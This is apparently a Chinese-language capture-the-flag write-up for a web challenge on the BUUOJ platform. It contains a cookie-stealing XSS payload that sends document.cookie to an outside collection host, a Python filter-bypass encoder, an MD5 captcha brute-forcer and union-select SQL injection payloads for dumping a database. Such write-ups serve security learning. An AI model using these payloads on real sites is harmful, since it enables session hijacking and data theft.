经测试发现存在以下页面:
index.php
admin.php
login.php
register.php
post.php
commitbug.php
about.php
admin.php没有权限登录,联系下文估计是要得到admin的session登录
投稿存在XSS,但是存在一些过滤,使用Markup 转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新颜面
使用题目提供的站内XSS平台
添加windows.location.href
,并删去if判断那一段
(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
然后利用脚本,进行编码绕过,并且执行
xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
output += "&#" + str(ord(c))
print("<svg><script>eval("" + output + "")</script>")
然后把这些payload插入投稿
文章地址:http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html
在反馈页面反馈,刚刚发布的那篇文章,是的管理员去查看带有XSS的文章
MD5验证码脚本:
import hashlib
def func(md5_val):
for x in range(999999, 100000000):
md5_value=hashlib.md5(str(x)).hexdigest()
if md5_value[:6]==md5_val:
return str(x)
if __name__ == '__main__':
print func('b76301')
这里注意文章地址在反馈的时候要改成
http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html
XSS平台接收到一个来自内网访问的请求,这就是管理元的访问,使用这个PHPSESSION登录admin.php
登陆成功,经过测试发现是个很简单的联合查询注入,一系列注入payload如下:
-2 union select 1,2,3#
-2 union select 1,database(),user()#
-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#
-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#
-2 union select 1,2,group_concat(flagg) from ciscn.flag#